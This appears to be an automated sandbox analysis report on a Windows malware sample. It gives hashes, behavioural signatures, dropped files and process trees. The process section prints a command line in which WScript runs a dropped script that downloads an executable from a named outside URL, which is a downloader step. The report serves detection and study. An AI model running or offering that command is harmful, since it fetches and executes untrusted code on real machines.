Analysis
-
max time kernel
118s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
11-05-2024 10:11
Static task
static1
Behavioral task
behavioral1
Sample
340ea24d6ed504ce81d6f74cfcd78b2f_JaffaCakes118.exe
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
340ea24d6ed504ce81d6f74cfcd78b2f_JaffaCakes118.exe
Resource
win10v2004-20240426-en
General
-
Target
340ea24d6ed504ce81d6f74cfcd78b2f_JaffaCakes118.exe
-
Size
184KB
-
MD5
340ea24d6ed504ce81d6f74cfcd78b2f
-
SHA1
e40404d9630208c0930c671b1555a92939423908
-
SHA256
1156482b8f1bec82e0b67e0d7cea60501256ef0d75a321d5c068fe1cffe31fe4
-
SHA512
a3a1c43a15a878957477aa7078604f381797a37994f427545f27d83942ca71d7855f7854e2a2efa45bd2bf8b9f801012c8753c85f15abd360c9238e25892b884
-
SSDEEP
3072:/MzsU0S0w8Hp9Rc/LB+dJGESR4hIRSYaVvb1NVFJNndnO3s:/7BSH8zUB+nGESaaRvoB7FJNndnN
Malware Config
Signatures
-
Blocklisted process makes network request 11 IoCs
Processes:
WScript.exeWScript.exeWScript.exeWScript.exeWScript.exeflow pid process 6 1912 WScript.exe 8 1912 WScript.exe 10 1912 WScript.exe 12 2588 WScript.exe 13 2588 WScript.exe 15 3008 WScript.exe 16 3008 WScript.exe 18 1644 WScript.exe 19 1644 WScript.exe 21 476 WScript.exe 22 476 WScript.exe -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious use of WriteProcessMemory 20 IoCs
Processes:
340ea24d6ed504ce81d6f74cfcd78b2f_JaffaCakes118.exedescription pid process target process PID 2008 wrote to memory of 1912 2008 340ea24d6ed504ce81d6f74cfcd78b2f_JaffaCakes118.exe WScript.exe PID 2008 wrote to memory of 1912 2008 340ea24d6ed504ce81d6f74cfcd78b2f_JaffaCakes118.exe WScript.exe PID 2008 wrote to memory of 1912 2008 340ea24d6ed504ce81d6f74cfcd78b2f_JaffaCakes118.exe WScript.exe PID 2008 wrote to memory of 1912 2008 340ea24d6ed504ce81d6f74cfcd78b2f_JaffaCakes118.exe WScript.exe PID 2008 wrote to memory of 2588 2008 340ea24d6ed504ce81d6f74cfcd78b2f_JaffaCakes118.exe WScript.exe PID 2008 wrote to memory of 2588 2008 340ea24d6ed504ce81d6f74cfcd78b2f_JaffaCakes118.exe WScript.exe PID 2008 wrote to memory of 2588 2008 340ea24d6ed504ce81d6f74cfcd78b2f_JaffaCakes118.exe WScript.exe PID 2008 wrote to memory of 2588 2008 340ea24d6ed504ce81d6f74cfcd78b2f_JaffaCakes118.exe WScript.exe PID 2008 wrote to memory of 3008 2008 340ea24d6ed504ce81d6f74cfcd78b2f_JaffaCakes118.exe WScript.exe PID 2008 wrote to memory of 3008 2008 340ea24d6ed504ce81d6f74cfcd78b2f_JaffaCakes118.exe WScript.exe PID 2008 wrote to memory of 3008 2008 340ea24d6ed504ce81d6f74cfcd78b2f_JaffaCakes118.exe WScript.exe PID 2008 wrote to memory of 3008 2008 340ea24d6ed504ce81d6f74cfcd78b2f_JaffaCakes118.exe WScript.exe PID 2008 wrote to memory of 1644 2008 340ea24d6ed504ce81d6f74cfcd78b2f_JaffaCakes118.exe WScript.exe PID 2008 wrote to memory of 1644 2008 340ea24d6ed504ce81d6f74cfcd78b2f_JaffaCakes118.exe WScript.exe PID 2008 wrote to memory of 1644 2008 340ea24d6ed504ce81d6f74cfcd78b2f_JaffaCakes118.exe WScript.exe PID 2008 wrote to memory of 1644 2008 340ea24d6ed504ce81d6f74cfcd78b2f_JaffaCakes118.exe WScript.exe PID 2008 wrote to memory of 476 2008 340ea24d6ed504ce81d6f74cfcd78b2f_JaffaCakes118.exe WScript.exe PID 2008 wrote to memory of 476 2008 340ea24d6ed504ce81d6f74cfcd78b2f_JaffaCakes118.exe WScript.exe PID 2008 wrote to memory of 476 2008 340ea24d6ed504ce81d6f74cfcd78b2f_JaffaCakes118.exe WScript.exe PID 2008 wrote to memory of 476 2008 340ea24d6ed504ce81d6f74cfcd78b2f_JaffaCakes118.exe WScript.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\340ea24d6ed504ce81d6f74cfcd78b2f_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\340ea24d6ed504ce81d6f74cfcd78b2f_JaffaCakes118.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufA3ED.js" http://www.djapp.info/?dotnet=4&file=installer C:\Users\Admin\AppData\Local\Temp\fufA3ED.exe2⤵
- Blocklisted process makes network request
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufA3ED.js" http://www.djapp.info/?dotnet=4&file=installer C:\Users\Admin\AppData\Local\Temp\fufA3ED.exe2⤵
- Blocklisted process makes network request
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufA3ED.js" http://www.djapp.info/?dotnet=4&file=installer C:\Users\Admin\AppData\Local\Temp\fufA3ED.exe2⤵
- Blocklisted process makes network request
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufA3ED.js" http://www.djapp.info/?dotnet=4&file=installer C:\Users\Admin\AppData\Local\Temp\fufA3ED.exe2⤵
- Blocklisted process makes network request
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufA3ED.js" http://www.djapp.info/?dotnet=4&file=installer C:\Users\Admin\AppData\Local\Temp\fufA3ED.exe2⤵
- Blocklisted process makes network request
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EAFilesize
1KB
MD52a8fa256ce6a53132c6e1887aec2dd90
SHA13c3712696c81ffbf3f78767fa642115336718db0
SHA2564372b48ab69f94556f8124623513fe956790e5250372c13577d51de0a309a2a6
SHA51286c1a4da1b625219443ffa86cf04f4fa477746d0f1ff2de1c8c8605fcb4eed09b9aa3a7e7a64c8ad59c50b2a65bf25d5ef493bf9b06726ecb83aa9519ef9f11b
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464Filesize
724B
MD58202a1cd02e7d69597995cabbe881a12
SHA18858d9d934b7aa9330ee73de6c476acf19929ff6
SHA25658f381c3a0a0ace6321da22e40bd44a597bd98b9c9390ab9258426b5cf75a7a5
SHA51297ba9fceab995d4bef706f8deef99e06862999734ebe6a05832c710104479c6337cbf0a76e1c1e0f91566a61334dc100d837dfd049e20da765fe49def684f9c9
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EAFilesize
410B
MD51d71f4b119db5bb534ebcf3ef9500b39
SHA1a390ae0f3258b38bdffc2f0ac8f3d4e397b737f1
SHA2561dddfdf5d6f6dae68843986ab704ef2265034a44fe85bdfd5c3b2172bd6350db
SHA51242774e2c2cad8ef14f25045ced60132e814fd71495ef7015a1773ce4eeff57710487c7bc6b861424689e3f7879ede075bc7b10df04c82cf2bd490bb1b93bfcef
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015Filesize
344B
MD52560d57a106b382df3da81a38640fd80
SHA1dfcb74409c942274fc477e09be665ddac8a97301
SHA2561a136a5736963318ac89a82784d5c6e81aa4d7a3c387819fbb415c9f9c63500a
SHA51204e1596cd40bd05b5d73ee0796121b9840964f74e7cd384ad48cb4d560f39d93023956ab5069186f78de3462632bab0ce59ba87045146f995f84358f80d61fd3
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464Filesize
392B
MD511bb89890321e38fe7d299d513f2e1af
SHA180697e071406470ccb19b2d79a23c201d191b726
SHA25675733d3c7cfc204af5001aa6f700678d515b27ae9d6d2f8fbbc4ec8cddcf0260
SHA512b24c925cdf974f8c24f6451f6bca71a452366cfa939438bc2d3ed11ac5e9141593230da58c8beb59dc00532722f5a0d51f78505b8381efae52612a6009290116
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5DKX8QD5\domain_profile[1].htmFilesize
40KB
MD5d552a8d95a9163cf0598793b488271ee
SHA1842c9605a992637c0d054754f3567f575c81c1d9
SHA25616861a28775fba7b3d49514347c3d13f3d921fad66f3a38158b3792e4a72410b
SHA512bf87d9281e2e263b1532fa36ec0149a99e84a6ac31da1974d34d3aac6d961518599096a9f4f1dd8027f817fae8eec274a59601300d65acb423adb6ca0453f12f
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5DKX8QD5\domain_profile[1].htmFilesize
40KB
MD5dc9a436112dfd1ce26e36f208a69b2d5
SHA1615cede934e0d0984c72a84c4813d7ee3a508c3f
SHA256f60e2e84dbcea335b49df05f73e599db18e161a774c2570b7283cd8c6a74d4c4
SHA512f382444e9a34c3409f2c1157a3a7472ea746130ade56575e69d382f0861c08202c1321aba6b9f4786ef3364f702fff06ee3c9e6593a8addfd373393de982e2fd
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\L9PN2QMY\domain_profile[1].htmFilesize
40KB
MD5eb00b0b1ebaee5d95780eea976ebfd74
SHA1d18e760a43215380e1fbc716e38ef68e4bc08e9c
SHA25698a3d4b73696843f008bafd1f2ed63dda7af1cc98cf143abc1bf23035ceac722
SHA51276a4f8f37a415566b648ff6dcedbb263f661860e1d3559c4caec4d343298dea17412b19256e85a2ceb631df9c17893b028e054cfeb6281bd25b778d27891cdf5
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\L9PN2QMY\domain_profile[1].htmFilesize
40KB
MD5ff36da59d060ad95d8f91cd888fd188d
SHA16f55e39faabca3c9492ceb590a3c193b796caa75
SHA2568fac22b1a212af2fe0d1264f5ccd039e9006eb30d9dfe4332c6526824d774831
SHA512de7494f1884b45798161081a27d3a0ad1e966867733c9386863a2d1ff59345574e39e338c59688cddcc61d2ffa7e34bfab7242e1c0231a215768f9fb5287efc0
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\L9PN2QMY\domain_profile[1].htmFilesize
40KB
MD5ad4eafee365d8869689c578152fda9fc
SHA149bb100de31eae7409fe25c6a0619308f2ab21b6
SHA2568faa39fba6cf0c77cf12c0f08f39b1f40f35253e7af9148df623b9e5b15707f8
SHA5120993d56438af6bc029fea532df308d9dc280845332ed10bb8b063077e586506c20d679eaf918b58abe64323fba994a391a46d198e561a73ef9e44c73918e320f
-
C:\Users\Admin\AppData\Local\Temp\CabEB78.tmpFilesize
65KB
MD5ac05d27423a85adc1622c714f2cb6184
SHA1b0fe2b1abddb97837ea0195be70ab2ff14d43198
SHA256c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d
SHA5126d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d
-
C:\Users\Admin\AppData\Local\Temp\Tar32D.tmpFilesize
171KB
MD59c0c641c06238516f27941aa1166d427
SHA164cd549fb8cf014fcd9312aa7a5b023847b6c977
SHA2564276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f
SHA512936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06
-
C:\Users\Admin\AppData\Local\Temp\fufA3ED.jsFilesize
3KB
MD53813cab188d1de6f92f8b82c2059991b
SHA14807cc6ea087a788e6bb8ebdf63c9d2a859aa4cb
SHA256a3c5baef033d6a5ab2babddcfc70fffe5cfbcef04f9a57f60ddf21a2ea0a876e
SHA51283b0c0ed660b29d1b99111e8a3f37cc1d2e7bada86a2a10ecaacb81b43fad2ec94da6707a26e5ae94d3ce48aa8fc766439df09a6619418f98a215b9d9a6e4d76
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\LCQGKNRL.txtFilesize
175B
MD5d5990bb98bf254a4ac236137d3531ff9
SHA194ddf9e692aeab192734b419c3c942ebf8d93b9d
SHA25670182b68463c44af9f198c1d7072f84d3ccefaea800c678b70f834bdb55a1855
SHA5125c85230e836c5f5a639ca815aef44220746aabaeeb0056af53e6378d2ff8db9d7eb7a0601635034a347a09839d51883345c8109ad020afb94fb64c08e1076b06